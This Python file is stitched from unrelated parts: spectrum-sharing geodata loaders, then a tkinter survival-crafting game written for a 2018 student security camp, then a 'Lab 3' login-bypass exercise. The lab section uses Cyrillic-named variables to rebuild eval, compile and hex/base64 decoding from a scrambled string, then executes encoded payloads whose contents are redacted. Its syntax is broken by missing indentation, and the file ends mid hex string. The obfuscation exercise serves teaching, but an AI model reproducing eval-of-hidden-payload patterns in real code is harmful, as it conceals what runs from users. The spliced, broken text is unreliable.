  """Gets Coastal DPA zones.

  Coastal DPA zones are Dynamic Protection Area monitored through the use of
  ESC sensors.

  Args:
    kml_path: Optional path to the Coastal DPA KML. If unspecified, use the
      default one from the `data/ntia/` folder.

  Returns:
    A dict of DPA struct keyed by their names, each one holding following
    attributes:
      geometry: A |shapely.Polygon or Point| defining the DPA.
      protectionCritDbmPer10MHz: The protection threshold (dBm/10MHz).
      refHeightMeters: The radar antenna height (meters).
      antennaBeamwidthDeg: The antenna beamwidth (degrees).
      minAzimuthDeg: The radar min azimuth (degrees).
      maxAzimuthDeg: The radar max azimuth (degrees).
      catBNeighborDist: The CatB neighboring distance (km).
  """
  global _coastal_dpa_zones
  global _coastal_dpa_path
  # Reload on first use, or when a different KML path is requested.
  if _coastal_dpa_zones is None or kml_path != _coastal_dpa_path:
    _coastal_dpa_path = kml_path
    if kml_path is None:
      kml_path = os.path.join(CONFIG.GetNtiaDir(), COASTAL_DPA_ZONE_FILE)
    # fix_invalid left False to auto-detect issues with the provided KML.
    _coastal_dpa_zones = _LoadDpaZones(kml_path, COASTAL_DPA_PROPERTIES,
                                       fix_invalid=False)
  return _coastal_dpa_zones
def GetPortalDpaZones(kml_path=None):
  """Gets Portal DPA zones.

  Portal DPA zones are Dynamic Protection Area monitored through the use of
  internet portal.

  Args:
    kml_path: Optional path to the Portal DPA KML. If unspecified, use the
      default one from the `data/ntia/` folder.

  Returns:
    A dict of DPA struct keyed by their names, each one holding following
    attributes:
      geometry: A |shapely.Polygon or Point| defining the DPA.
      protectionCritDbmPer10MHz: The protection threshold (dBm/10MHz).
      refHeightMeters: The radar antenna height (meters).
      antennaBeamwidthDeg: The antenna beamwidth (degrees).
      minAzimuthDeg: The radar min azimuth (degrees).
      maxAzimuthDeg: The radar max azimuth (degrees).
      catBNeighborDist: The CatB neighboring distance (km).
  """
  global _portal_dpa_zones
  global _portal_dpa_path
  # Reload on first use, or when a different KML path is requested.
  if _portal_dpa_zones is None or kml_path != _portal_dpa_path:
    _portal_dpa_path = kml_path
    if kml_path is None:
      kml_path = os.path.join(CONFIG.GetNtiaDir(), PORTAL_DPA_ZONE_FILE)
    # fix_invalid left False to auto-detect issues with the provided KML.
    _portal_dpa_zones = _LoadDpaZones(kml_path, PORTAL_DPA_PROPERTIES,
                                      fix_invalid=False)
  return _portal_dpa_zones
def GetUsCanadaBorder():
  """Gets the US/Canada border as a |shapely.MultiLineString|."""
  global _uscanada_border
  if _uscanada_border is None:
    # Load once and cache: merge all KML line segments into one geometry.
    border_file = os.path.join(CONFIG.GetFccDir(), USCANADA_BORDER_FILE)
    segments = _ReadKmlBorder(border_file)
    _uscanada_border = ops.unary_union(segments.values())
  return _uscanada_border
def GetUsBorder():
  """Gets the US border as a |shapely.MultiPolygon|.

  This is a composite US border for simulation purposes only.
  """
  global _border_zone
  if _border_zone is None:
    # Load once and cache: union all zones from the border KMZ.
    border_file = os.path.join(CONFIG.GetFccDir(), USBORDER_FILE)
    zones = _ReadKmlZones(border_file)
    _border_zone = ops.unary_union(zones.values())
  return _border_zone
def GetUrbanAreas(simplify_deg=1e-3):
  """Gets the US urban area as a |shapely.GeometryCollection|.

  Note: Client code should cache it as expensive to load (and not cached here).

  Args:
    simplify_deg: if defined, simplify the zone with given tolerance (degrees).
      Default is 1e-3 which corresponds roughly to 100m in continental US.
  """
  kml_file = os.path.join(CONFIG.GetNtiaDir(), URBAN_AREAS_FILE)
  zones = _ReadKmlZones(kml_file, root_id_zone='Document', simplify=simplify_deg)
  # Kept as a GeometryCollection (not unioned) for loading speed.
  return sgeo.GeometryCollection(zones.values())
def GetFccOfficeLocations():
  """Gets FCC Office locations.

  14 FCC field offices that require protection are defined.

  Returns:
    A list of locations defined as dict with keys 'latitude' and 'longitude'.
  """
  offices_csv = os.path.join(CONFIG.GetFccDir(), FCC_FIELD_OFFICES_FILE)
  offices = []
  # Columns 1 and 2 of the CSV hold latitude and longitude respectively.
  for lat, lng in np.loadtxt(offices_csv, delimiter=',', usecols=(1, 2)):
    offices.append({'latitude': lat, 'longitude': lng})
  return offices
|
########################################################################################################################
"""
Inspired by http://usingpython.com/programs/ 'Crafting Challenge' Game
Created by SimplyNate
Coding Module - Python Lab
Craft the items indicated in the Quests panel to win the game.
Hunger ticks down after each input by the amount indicated below.
When hunger reaches 0, Health will begin ticking down instead after each input.
When health reaches 0, the game ends.
Made for the GenCyber Hawaii SecurityX Camp 2018
"""
########################################################################################################################
# Imports dependencies required for drawing the GUI and other functions
import tkinter
from tkinter import *
from tkinter import ttk
# Class that initiates data for use in the GUI class
class Game:
    """Container for all tunable game data.

    A fresh instance is created per play session (held as `Gui.game`), and a
    second untouched instance (`Gui.g`) serves as the reference for maximum
    hunger/health values.  The section between the EDIT markers is intended
    to be modified by students to re-balance the game.
    """

    # Function that initializes variables with data
    def __init__(self):
        # EDIT VARIABLES BELOW #########################################################################################
        # List of commands - Gets displayed in the "Help" menu
        # (keys are what the player types; values are the help text shown)
        self.commands = {
            "i": "see inventory",
            "c": "see crafting options",
            "h": "see help",
            "q": "see quests",
            "craft [item] [amount]": "craft something from inventory items",
            "eat [item]": "Eat something from inventory to restore hunger",
            "gather [item]": "Increase resources in your inventory"
        }
        # an inventory of items - Gets listed in the "Inventory" menu
        # Edit the number values to change your starting amount
        self.items = {
            "flint": 50,
            "grass": 100,
            "hay": 0,
            "tree": 100,
            "log": 0,
            "sapling": 100,
            "twig": 0,
            "boulder": 30,
            "rock": 0,
            "pickaxe": 0,
            "axe": 0,
            "firepit": 0,
            "tent": 0,
            "torch": 0,
        }
        # List of Gatherable items
        # Add items from the items list below to be able to gather different items
        self.gatherable = [
            "flint",
            "grass",
            "tree",
            "sapling",
            "boulder",
        ]
        # Inventory of Food items
        # Edit the "amount" numbers to change how much you start with.
        # Edit the "restores" number to change how much each food restores hunger by.
        self.foods = {
            "potato": {
                "amount": 10,
                "restores": 5
            },
            "bread": {
                "amount": 5,
                "restores": 10
            },
            "apple": {
                "amount": 20,
                "restores": 2
            },
            "porkchop": {
                "amount": 5,
                "restores": 20
            }
        }
        # rules to make new objects
        # Change the number values to change how much resources required to craft the item
        # (each value maps an ingredient from self.items to the quantity consumed)
        self.craft = {
            "hay": {"grass": 1},
            "twig": {"sapling": 1},
            "log": {"axe": 1, "tree": 1},
            "axe": {"twig": 3, "flint": 1},
            "tent": {"twig": 10, "hay": 15},
            "firepit": {"boulder": 5, "log": 3, "twig": 1, "torch": 1},
            "torch": {"flint": 1, "grass": 1, "twig": 1},
            "pickaxe": {"flint": 2, "twig": 1}
        }
        # List of Quests
        # Add more quests by adding a new entry under here
        # (a quest is completed when an item whose capitalized name appears
        # in the quest string is crafted — see Gui.remove_quest)
        self.quests = [
            "Craft a Hay",
            "Craft a Tent",
            "Craft a Firepit",
        ]
        # Hero Statistics
        # Change the hunger value to change how much hunger you start with
        # Change the hungerDecay value to change how quickly or slowly the hunger goes down by
        # Change the health value to change how much health you start with
        # Change the healthDecay value to change how quickly or slowly your health goes down by or regenerates by
        # Change the gatherRate value to change how much resources you get when using the gather command
        self.hero = {
            "hunger": 100,
            "hungerDecay": 5,
            "health": 20,
            "healthDecay": 2,
            "gatherRate": 2,
        }
########################################################################################################################
# End Recommended Editable Area #
########################################################################################################################
# Class that draws the GUI and runs the game logic and functions
class Gui:
    """Tkinter front end plus the turn-based game loop.

    Shared state lives in class attributes so every callback sees the same
    values:
      argument -- most recent raw command string entered by the player
      history  -- previously entered commands, newest first (capped at 100)
      index    -- cursor into `history` for Up/Down recall (-1 = not browsing)
      qtimes / itimes / ctimes / htimes -- open/close toggles for the
          Quests / Inventory / Crafting / Help panels (1 = open, 0 = closed)
      game -- the live, mutating Game instance for the current session
      g    -- an untouched Game instance used as the reference for maximum
          hunger/health values
    """
    argument = ""
    history = []
    index = -1
    qtimes = 0
    itimes = 0
    ctimes = 0
    htimes = 0
    game = Game()
    g = Game()  # Reference instance; never mutated (holds max stat values)

    def __init__(self, master):
        """Creates every widget up front; most are placed later by startgame()."""
        # Window itself
        self.master = master
        master.title("Python Game")
        master.geometry("960x480")
        master.resizable(False, False)
        master.configure(background='black')
        # Health and Hunger bar themes
        self.s = ttk.Style()
        self.s.theme_use('clam')
        self.s.configure("red.Horizontal.TProgressbar", foreground="red", background="red")
        self.s.configure("green.Horizontal.TProgressbar", foreground="green", background="green")
        self.s.configure("yellow.Horizontal.TProgressbar", foreground="yellow", background="yellow")
        self.s.configure("brown.Horizontal.TProgressbar", foreground="brown", background="brown")
        # Title Label
        self.title = Label(master, text="Generic Survival Game", bg="black", fg="white", font=("Impact", 48))
        self.title.place(x=180, y=13)
        # Subtitle Label
        self.subtitle = Label(master, text="Written entirely in Python", bg="black", fg="white", font=("Georgia", 16))
        self.subtitle.place(x=350, y=90)
        # Another Label below the Subtitle
        self.instruction = Label(master, text="Survive the Night!", bg="black", fg="white", font=("Georgia", 24))
        self.instruction.place(x=340, y=200)
        # Button that starts or restarts the game
        self.start = Button(master, text="Start", command=self.startgame, font=("Impact", 28))
        self.start.place(x=230, y=350, width=200, height=100)
        # Button that quits the game
        self.quit = Button(master, text="Quit", command=quit, font=("Impact", 28))
        self.quit.place(x=530, y=350, width=200, height=100)
        # Label telling where to put command
        self.command = Label(master, text="Enter Your Command:", bg="black", fg='white')
        self.command.configure(highlightbackground='white')
        # Top divider between user entry and rest of game
        self.div = Label(master, text="", bg="white")
        # Divider between Label and User entry box
        self.div2 = Label(master, text="", bg="white")
        # Where the user types their arguments
        self.userCommand = Entry(master, bg="black", fg="white", font=("Georgia", 14), borderwidth=0)
        # Output box that gives user more info
        self.outbox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
        # Quests "button"
        self.quests = Label(master, text="[Q]uests", bg="black", fg="white", borderwidth=2, relief="groove")
        # Inventory "button"
        self.inventory = Label(master, text="[I]nventory", bg="black", fg="white", borderwidth=2, relief="groove")
        # Crafting "button"
        self.crafting = Label(master, text="[C]rafting", bg="black", fg="white", borderwidth=2, relief="groove")
        # Help "Button"
        self.help = Label(master, text="[H]elp", bg="black", fg="white", borderwidth=2, relief="groove")
        # Boxes
        self.questbox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
        self.inventorybox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
        self.craftbox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
        self.helpbox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
        # Health display
        self.health = Label(master, text=("Health: " + str(Gui.game.hero["health"])), bg="black", fg="white",
                            font=("Georgia", 16))
        # Hunger display
        self.hunger = Label(master, text="Hunger: " + str(Gui.game.hero["hunger"]), bg="black", fg="white",
                            font=("Georgia", 16))
        # Popup notification
        self.popup = Label(master, text="You survived!", bg="black", fg="white", borderwidth=2, relief="groove")
        # Health Bar
        self.hbar = ttk.Progressbar(master, orient="horizontal", length=200, mode="determinate")
        # Hunger Bar
        self.hungerbar = ttk.Progressbar(master, orient="horizontal", length=200, mode="determinate")

    def startgame(self):
        """Resets state with a fresh Game, swaps the menu UI for the in-game
        UI, and binds the keyboard handlers."""
        # Get new instance of Game
        Gui.game = Game()
        # Place UI Elements
        self.command.place(x=10, y=448, height=32)
        self.div.place(y=447, height=1, width=960)
        self.div2.place(y=448, x=140, height=32)
        self.userCommand.place(x=150, y=448, height=32, width=820)
        self.userCommand.focus()
        # Binds key to perform a specific function
        self.master.bind('<Return>', self.parse)  # Sends data
        self.master.bind('<Up>', self.get_history_up)  # Gets previous args
        self.master.bind('<Down>', self.get_history_down)  # Gets previous args
        # Places rest of UI
        self.outbox.place(y=340, width=960, height=106)
        self.quests.place(x=0, y=300, width=240, height=40)
        self.inventory.place(x=240, y=300, width=240, height=40)
        self.crafting.place(x=480, y=300, width=240, height=40)
        self.help.place(x=720, y=300, width=240, height=40)
        self.health.place(x=200, y=130)
        self.hunger.place(x=200, y=160)
        self.hunger.config(text="Hunger: " + str(Gui.game.hero["hunger"]))
        self.health.config(text="Health: " + str(Gui.game.hero["health"]))
        # Forget buttons and instruction
        self.start.place_forget()
        self.quit.place_forget()
        self.instruction.place_forget()
        self.hbar.place(x=340, y=137)
        self.hbar.config(style="green.Horizontal.TProgressbar")
        self.hbar["value"] = Gui.game.hero["health"]
        self.hbar["maximum"] = Gui.game.hero["health"]
        self.hungerbar.place(x=340, y=167)
        self.hungerbar.config(style="brown.Horizontal.TProgressbar")
        self.hungerbar["value"] = Gui.game.hero["hunger"]
        self.hungerbar["maximum"] = Gui.game.hero["hunger"]

    def endgame(self, endtext):
        """Tears down the in-game UI and shows the win/lose menu.

        Args:
          endtext: "win" or "lose" — selects the message displayed.
        """
        # Reset all shared class-level state for the next session.
        Gui.argument = ""
        Gui.history = []
        Gui.index = -1
        Gui.qtimes = 0
        Gui.itimes = 0
        Gui.ctimes = 0
        Gui.htimes = 0
        Gui.game = Game()  # Needed
        self.start.config(text="Restart")
        self.start.place(x=230, y=350, width=200, height=100)
        self.quit.place(x=530, y=350, width=200, height=100)
        if endtext == "lose":
            self.instruction.config(text="You have Died!")
            self.instruction.place(x=370, y=200)
        elif endtext == "win":
            self.instruction.config(text="You have Survived!")
            self.instruction.place(x=330, y=200)
        self.command.place_forget()
        self.div.place_forget()
        self.div2.place_forget()
        self.userCommand.place_forget()
        self.outbox.config(state="normal")
        self.outbox.delete("1.0", END)
        self.outbox.config(state="disabled")
        self.outbox.place_forget()
        self.quests.config(relief="groove", bg="black", fg="white")
        self.quests.place_forget()
        self.inventory.config(relief="groove", bg="black", fg="white")
        self.inventory.place_forget()
        self.crafting.config(relief="groove", bg="black", fg="white")
        self.crafting.place_forget()
        self.help.config(relief="groove", bg="black", fg="white")
        self.help.place_forget()
        self.health.place_forget()
        self.hunger.place_forget()
        self.inventorybox.place_forget()
        self.questbox.place_forget()
        self.helpbox.place_forget()
        self.craftbox.place_forget()
        self.hungerbar.place_forget()
        self.hbar.place_forget()

    # Gets the text inputted by the user and parses accordingly
    def parse(self, event):
        """<Return> handler: executes the typed command, then applies the
        per-turn hunger/health tick and refreshes the status displays.

        Args:
          event: the Tk key event (required by bind(); otherwise unused).
        """
        Gui.index = -1
        Gui.argument = self.userCommand.get()
        self.userCommand.delete(0, 'end')
        # BUGFIX: compare strings with !=, not `is not` — identity tests on
        # str literals are implementation-dependent (and a SyntaxWarning).
        if Gui.argument != "" and Gui.argument != " ":
            Gui.history.insert(0, Gui.argument)
            if len(Gui.history) > 100:
                # BUGFIX: drop the oldest entry (end of list) to bound the
                # history; `remove(-1)` searched for a *value* of -1, never
                # matched, and left the list growing without limit.
                Gui.history.pop()
        Gui.argument = Gui.argument.strip().lower()  # Normalizes input
        # NOTE: in the branches below `and` binds tighter than `or`, so a
        # panel toggles on either the full word anywhere in the input or the
        # single-letter shortcut as the entire input.
        if "craft" in Gui.argument and len(Gui.argument.split(" ")) > 1:
            self.craft(Gui.argument)  # Runs rest of game logic
        elif "eat " in Gui.argument:
            tokens = Gui.argument.split(" ")
            self.write_to_outbox("Eating " + tokens[1])
            self.eat(tokens[1])
        elif "gather " in Gui.argument:
            tokens = Gui.argument.split(" ")
            self.write_to_outbox("Gathering " + tokens[1])
            self.gather(tokens[1])
        elif "quests" in Gui.argument or "q" in Gui.argument and len(Gui.argument) == 1:
            Gui.qtimes += 1
            if Gui.qtimes == 1:  # BUGFIX: was `is 1` (identity, not equality)
                self.quests.config(relief="sunken", bg="white", fg="black")
                self.questbox.config(state="normal")
                self.questbox.delete("1.0", END)
                a = get_everything(Gui.game.quests)  # Different way to do it
                self.questbox.insert(INSERT, a)
                self.questbox.place(x=0, y=210, height=100, width=240)
                self.questbox.config(state="disabled")
                # Output Box
                self.write_to_outbox("Opened Quests menu")
            else:
                Gui.qtimes = 0
                self.quests.config(relief="groove", bg="black", fg="white")
                self.questbox.place_forget()
                # Output Box
                self.write_to_outbox("Closed Quests menu")
        elif "inventory" in Gui.argument or "i" in Gui.argument and len(Gui.argument) == 1:
            Gui.itimes += 1
            if Gui.itimes == 1:  # BUGFIX: was `is 1`
                self.inventory.config(relief="sunken", bg="white", fg="black")
                self.inventorybox.config(state="normal")
                self.inventorybox.delete("1.0", END)
                self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
                self.inventorybox.place(x=240, y=210, height=100, width=240)
                self.inventorybox.config(state="disabled")
                self.write_to_outbox("Opened Inventory menu")
            else:
                Gui.itimes = 0
                self.inventory.config(relief="groove", bg="black", fg="white")
                self.inventorybox.place_forget()
                self.write_to_outbox("Closed Inventory menu")
        elif "crafting" == Gui.argument or "c" in Gui.argument and len(Gui.argument) == 1:
            Gui.ctimes += 1
            if Gui.ctimes == 1:  # BUGFIX: was `is 1`
                self.crafting.config(relief="sunken", bg="white", fg="black")
                self.craftbox.config(state="normal")
                self.craftbox.delete("1.0", END)
                self.craftbox.insert(INSERT, get_everything(Gui.game.craft))
                self.craftbox.place(x=480, y=210, height=100, width=240)
                self.craftbox.config(state="disabled")
                self.write_to_outbox("Opened Crafting menu")
            else:
                Gui.ctimes = 0
                self.crafting.config(relief="groove", bg="black", fg="white")
                self.craftbox.place_forget()
                self.write_to_outbox("Closed Crafting menu")
        elif "help" in Gui.argument or "h" in Gui.argument and len(Gui.argument) == 1:
            Gui.htimes += 1
            if Gui.htimes == 1:  # BUGFIX: was `is 1`
                self.help.config(relief="sunken", bg="white", fg="black")
                self.helpbox.config(state="normal")
                self.helpbox.delete("1.0", END)
                self.helpbox.insert(INSERT, get_everything(Gui.game.commands))
                self.helpbox.place(x=720, y=210, height=100, width=240)
                self.helpbox.config(state="disabled")
                self.write_to_outbox("Opened Help menu")
            else:
                Gui.htimes = 0
                self.help.config(relief="groove", bg="black", fg="white")
                self.helpbox.place_forget()
                self.write_to_outbox("Closed Help menu")
        else:
            self.write_to_outbox(Gui.argument + " is not a valid argument")
        # if the command is not blank, apply the hunger/health tick
        if Gui.argument != "" and Gui.argument != " ":
            # Hunger and Health
            # If hunger is greater than 70% of max
            if Gui.game.hero["hunger"] >= int(Gui.g.hero["hunger"] * 0.7):
                # If health is lower than maximum
                if Gui.game.hero["health"] < Gui.g.hero["health"]:
                    # Regeneration of health
                    Gui.game.hero["health"] += Gui.game.hero["healthDecay"]
                    # If health is greater than maximum
                    if Gui.game.hero["health"] > Gui.g.hero["health"]:
                        # Set health to maximum
                        Gui.game.hero["health"] = Gui.g.hero["health"]
            if Gui.game.hero["hunger"] > 0 and "eat" not in Gui.argument.lower():
                Gui.game.hero["hunger"] -= Gui.game.hero["hungerDecay"]
                if Gui.game.hero["hunger"] < 0:
                    Gui.game.hero["hunger"] = 0
            if Gui.game.hero["hunger"] == 0 and "eat" not in Gui.argument.lower():
                # Starving: health drains instead of hunger
                if Gui.game.hero["health"] != 0:
                    Gui.game.hero["health"] -= Gui.game.hero["healthDecay"]
                    if Gui.game.hero["health"] < 0:
                        Gui.game.hero["health"] = 0
                if Gui.game.hero["health"] == 0:
                    self.endgame("lose")
            self.hbar["value"] = Gui.game.hero["health"]
            self.hungerbar["value"] = Gui.game.hero["hunger"]
            self.hunger.config(text="Hunger: " + str(Gui.game.hero["hunger"]))
            self.health.config(text="Health: " + str(Gui.game.hero["health"]))
            # Recolor the health bar by remaining fraction of max health.
            if Gui.game.hero["health"] > int(Gui.g.hero["health"] * 0.5):
                self.hbar.configure(style="green.Horizontal.TProgressbar")
            elif Gui.game.hero["health"] > int(Gui.g.hero["health"] * 0.25):
                self.hbar.configure(style="yellow.Horizontal.TProgressbar")
            else:
                self.hbar.configure(style="red.Horizontal.TProgressbar")

    # Function that "returns" previous commands
    def get_history_up(self, event):
        """<Up> handler: steps backward through command history into the
        entry box, clamping at the oldest entry."""
        amt = len(Gui.history)
        if amt > 0:
            Gui.index += 1
            if Gui.index >= amt:
                Gui.index = amt - 1  # Clamp at the oldest command
            self.userCommand.delete(0, 'end')
            self.userCommand.insert(0, Gui.history[Gui.index])

    # Function that "returns" previous commands (backwards)
    def get_history_down(self, event):
        """<Down> handler: steps forward toward the newest command; stepping
        past the newest clears the entry box."""
        if len(Gui.history) > 0:
            Gui.index -= 1
            if Gui.index >= 0:
                self.userCommand.delete(0, 'end')
                self.userCommand.insert(0, Gui.history[Gui.index])
            if Gui.index <= -1:
                Gui.index = -1
                self.userCommand.delete(0, 'end')

    def write_to_outbox(self, text):
        """Appends `text` plus a newline to the scrolling output box."""
        text = text + "\n"
        self.outbox.config(state="normal")
        self.outbox.insert(END, text)
        self.outbox.config(state="disabled")
        self.outbox.see(tkinter.END)  # Keep the newest line visible

    def eat(self, item):
        """Consumes one `item` from the food inventory, restoring hunger;
        unknown items still cost the player a hunger tick."""
        if item in Gui.game.foods.keys() and Gui.game.foods[item]["amount"] > 0:
            self.write_to_outbox("Restored " + str(Gui.game.foods[item]["restores"]) + " hunger")
            # NOTE(review): 100 is hard-coded here; if Game's starting hunger
            # is edited, Gui.g.hero["hunger"] would be the consistent cap.
            if Gui.game.hero["hunger"] != 100:
                Gui.game.hero["hunger"] += Gui.game.foods[item]["restores"]
                if Gui.game.hero["hunger"] > 100:
                    Gui.game.hero["hunger"] = 100
                self.hunger.config(text="Hunger: " + str(Gui.game.hero["hunger"]))
            Gui.game.foods[item]["amount"] -= 1
            self.inventorybox.config(state="normal")
            self.inventorybox.delete("1.0", END)
            self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
            self.inventorybox.config(state="disabled")
        else:
            # Failed eat attempts still tick hunger (and health if starving).
            self.write_to_outbox(item + " is not an edible item")
            if Gui.game.hero["hunger"] > 0:
                Gui.game.hero["hunger"] -= Gui.game.hero["hungerDecay"]
                if Gui.game.hero["hunger"] < 0:
                    Gui.game.hero["hunger"] = 0
                self.hunger.config(text="Hunger: " + str(Gui.game.hero["hunger"]))
            if Gui.game.hero["hunger"] == 0:
                if Gui.game.hero["health"] != 0:
                    Gui.game.hero["health"] -= Gui.game.hero["healthDecay"]
                    if Gui.game.hero["health"] <= 0:
                        self.endgame("lose")
                else:
                    self.endgame("lose")
        self.hungerbar["value"] = Gui.game.hero["hunger"]

    def gather(self, item):
        """Adds `gatherRate` of `item` to the inventory (resources) or food
        stock; anything else is rejected."""
        if item in Gui.game.gatherable:
            self.write_to_outbox("Gathered " + str(Gui.game.hero["gatherRate"]) + " " + item)
            Gui.game.items[item] += Gui.game.hero["gatherRate"]
            self.inventorybox.config(state="normal")
            self.inventorybox.delete("1.0", END)
            self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
            self.inventorybox.config(state="disabled")
        elif item in Gui.game.foods:
            self.write_to_outbox("Gathered " + item)
            Gui.game.foods[item]["amount"] += Gui.game.hero["gatherRate"]
            self.inventorybox.config(state="normal")
            self.inventorybox.delete("1.0", END)
            self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
            self.inventorybox.config(state="disabled")
        else:
            self.write_to_outbox(item + " is not gatherable")

    # Method for Crafting items
    def craft(self, arg):
        """Crafts the item named in `arg` ("craft item [amount]"), consuming
        recipe ingredients, clearing matching quests, and checking the win
        condition."""
        command = arg.split(" ")
        if len(command) > 1:
            item = command[1].lower()
        else:
            self.write_to_outbox("Error: No item specified.")
            return
        # If a quantity is defined, try to extract it
        if len(command) > 2:
            try:
                quantity = int(command[2].lower())
            except ValueError:
                self.write_to_outbox("Error: Please switch position of item and quantity")
                return
        else:
            quantity = 1
        self.write_to_outbox("Crafting " + item + ":")
        if item in Gui.game.craft:
            # Print item requirements and check if all items are present
            for i in Gui.game.craft[item]:
                self.write_to_outbox(f"{item} requires: {str(Gui.game.craft[item][i] * quantity)} {i}. You have: {str(Gui.game.items[i])}")
                if (Gui.game.craft[item][i] * quantity) > Gui.game.items[i]:
                    self.write_to_outbox("Item cannot be crafted.")
                    return
            # Remove the items from the inventory
            for i in Gui.game.craft[item]:
                Gui.game.items[i] -= Gui.game.craft[item][i] * quantity
            # Add the new item
            Gui.game.items[item] += 1 * quantity
            self.remove_quest(item)
            self.write_to_outbox(f"{item} crafted.\n")
            self.inventorybox.config(state="normal")
            self.inventorybox.delete("1.0", END)
            self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
            self.inventorybox.config(state="disabled")
            if len(Gui.game.quests) == 0:
                self.write_to_outbox("\n**YOU HAVE MANAGED TO SURVIVE!\nWELL DONE!")
                self.endgame("win")
        else:
            self.write_to_outbox("Error: That item does not exist in the crafting table.")

    def remove_quest(self, arg):
        """Removes every quest whose text contains the capitalized name of
        the just-crafted item `arg`, then redraws the quest panel."""
        arg = arg.capitalize()
        # Iterate a copy so removal during iteration is safe.
        for item in Gui.game.quests[:]:
            if arg in item:
                try:
                    Gui.game.quests.remove(item)
                except ValueError:
                    pass
        self.questbox.config(state="normal")
        self.questbox.delete("1.0", END)
        self.questbox.insert(INSERT, get_everything(Gui.game.quests))
        self.questbox.config(state="disabled")
def get_everything(objects):
    """Formats one of the game's data collections for display in a menu box.

    Dispatches on object identity against the current Game instance
    (Gui.game):
      * quests (list)   -> one quest per line
      * craft (dict)    -> "x can be made with:" plus its ingredient counts
      * items (dict)    -> inventory counts followed by food counts
      * anything else   -> "key : value" per line (used for the Help menu)

    Returns the assembled multi-line string.
    """
    if objects is Gui.game.quests:
        # One quest title per line.
        return "".join(quest + "\n" for quest in objects)
    elif objects is Gui.game.craft:
        # Recipe listing: header line, then one line per ingredient,
        # blank line between recipes.
        parts = []
        for recipe, ingredients in objects.items():
            parts.append(recipe + " can be made with:\n")
            for name, count in ingredients.items():
                parts.append(str(count) + " " + name + "\n")
            parts.append("\n")
        return "".join(parts)
    elif objects is Gui.game.items:
        # Inventory counts, with the food stock appended below.
        lines = [key + "\t: " + str(count) + "\n" for key, count in objects.items()]
        lines += [food + "\t: " + str(info["amount"]) + "\n"
                  for food, info in Gui.game.foods.items()]
        return "".join(lines)
    else:
        return "".join(key + " : " + str(value) + "\n" for key, value in objects.items())
########################################################################################################################
# END LAB 2 ############################################################################################################
########################################################################################################################
########################################################################################################################
# START LAB 3 ##########################################################################################################
########################################################################################################################
"""
Warning: Do not alter anything below until instructed to do so.
Instructions: Attempt to bypass or disable the login box
Remember: Undo [CTRL]+[Z] is your friend
"""
def qeydfsfgdstreygfd(hytedy, ghytjh, fewqe):
    """Adds (concatenates) its three arguments in order.

    Part of the Lab 3 obfuscation puzzle — the unreadable name is
    intentional and must stay, since the lines below call it by name.
    """
    joined = hytedy + ghytjh
    joined = joined + fewqe
    return joined
from base64 import b64decode as безопасность
pdftagrthrsae = "ianm_girstn<8ab6>_u-ecxmeaoplvfybh."
лояльность = qeydfsfgdstreygfd(pdftagrthrsae[4],pdftagrthrsae[17],pdftagrthrsae[3])+"ai"+qeydfsfgdstreygfd(pdftagrthrsae[2],pdftagrthrsae[17],"_")
Кремль = qeydfsfgdstreygfd(pdftagrthrsae[11],pdftagrthrsae[8],pdftagrthrsae[9])+qeydfsfgdstreygfd(pdftagrthrsae[7]+"i",pdftagrthrsae[10],pdftagrthrsae[5]+">")
технологии = qeydfsfgdstreygfd(pdftagrthrsae[20],"",pdftagrthrsae[29])
компьютер = qeydfsfgdstreygfd("",pdftagrthrsae[1],pdftagrthrsae[28])
кодирование = qeydfsfgdstreygfd(технологии,"",компьютер)
нарушения = eval(compile(qeydfsfgdstreygfd("c",pdftagrthrsae[26]+"m",pdftagrthrsae[27]+"i")+qeydfsfgdstreygfd(pdftagrthrsae[28],pdftagrthrsae[20],""), Кремль, кодирование))
оценивать = eval(compile(кодирование, Кремль, кодирование))
сила = qeydfsfgdstreygfd(pdftagrthrsae[32]+"y","t",pdftagrthrsae[20]+pdftagrthrsae[8]+".")
информационная = оценивать(нарушения(сила+qeydfsfgdstreygfd(pdftagrthrsae[-5]+"ro","m",pdftagrthrsae[-2]+pdftagrthrsae[20])+pdftagrthrsae[22], Кремль, кодирование))
большевик = pdftagrthrsae[18]+pdftagrthrsae[9]+qeydfsfgdstreygfd(pdftagrthrsae[30],pdftagrthrsae[19],pdftagrthrsae[12])
взлом = оценивать(нарушения(qeydfsfgdstreygfd(pdftagrthrsae[(9-1)],pdftagrthrsae[(27-9*(2-(-2)))*-1],pdftagrthrsae[int((2/(1/4))-1)]), Кремль, кодирование))
советский = qeydfsfgdstreygfd(pdftagrthrsae[20],pdftagrthrsae[22],pdftagrthrsae[(17+3)])+pdftagrthrsae[(7*3)]
выигрыш = оценивать(нарушения(pdftagrthrsae[4]+qeydfsfgdstreygfd("_"+pdftagrthrsae[2]+pdftagrthrsae[1],pdftagrthrsae[3]+pdftagrthrsae[20],pdftagrthrsae[17]+pdftagrthrsae[4]), Кремль, кодирование))
"""
So you want to know what goes on below?
The first step is to decode the message in tow.
There are many unnecessary marks under the score
But only one aligns different than the rest.
Once you find the correct mark,
Move not more than two forward and not more than three backward,
For these nefarious characters
Are plotting against you.
Fuse all the pieces together
And you will find a secret message,
Cast in base64
A firey tool will help
Lead the way
<KEY>
"""
if выигрыш == лояльность:
оценивать(нарушения(взлом(безопасность(
'<KEY>'
'<KEY>'
'<KEY>'
'<KEY>'
'<KEY>'
'c='),
большевик),
Кремль,
советский)
)
оценивать(
информационная(
'6C316C316C316C31280D0A096C6C316C31316C31280D0A09096C31316C6C316C31280D0A0909096D6C737734746A37363377303968'
'6773280D0A0909090927624446734D5777786244456F62444578624778736247776F44516F4A4A7A5A444D7A4532517A4D784E6B4D'
'7A4D545A444D7A45794F445A444E6B4D7A4D545A444D7A457A4D545A444D7A45794F445A444D7A457A4D545A444E6B4D7A4D545A44'
'4D7A270D0A090909092745794F445A454E6B4D334D7A63334D7A51334E445A424D7A637A4E6A4D7A4E7A637A4D444D354E6A67324E'
'7A637A4D6A6777524442424D446B794E7A56424D7A497A4F545A454E6A49304F4452464A77304B43536332516A59794E6B51324F44'
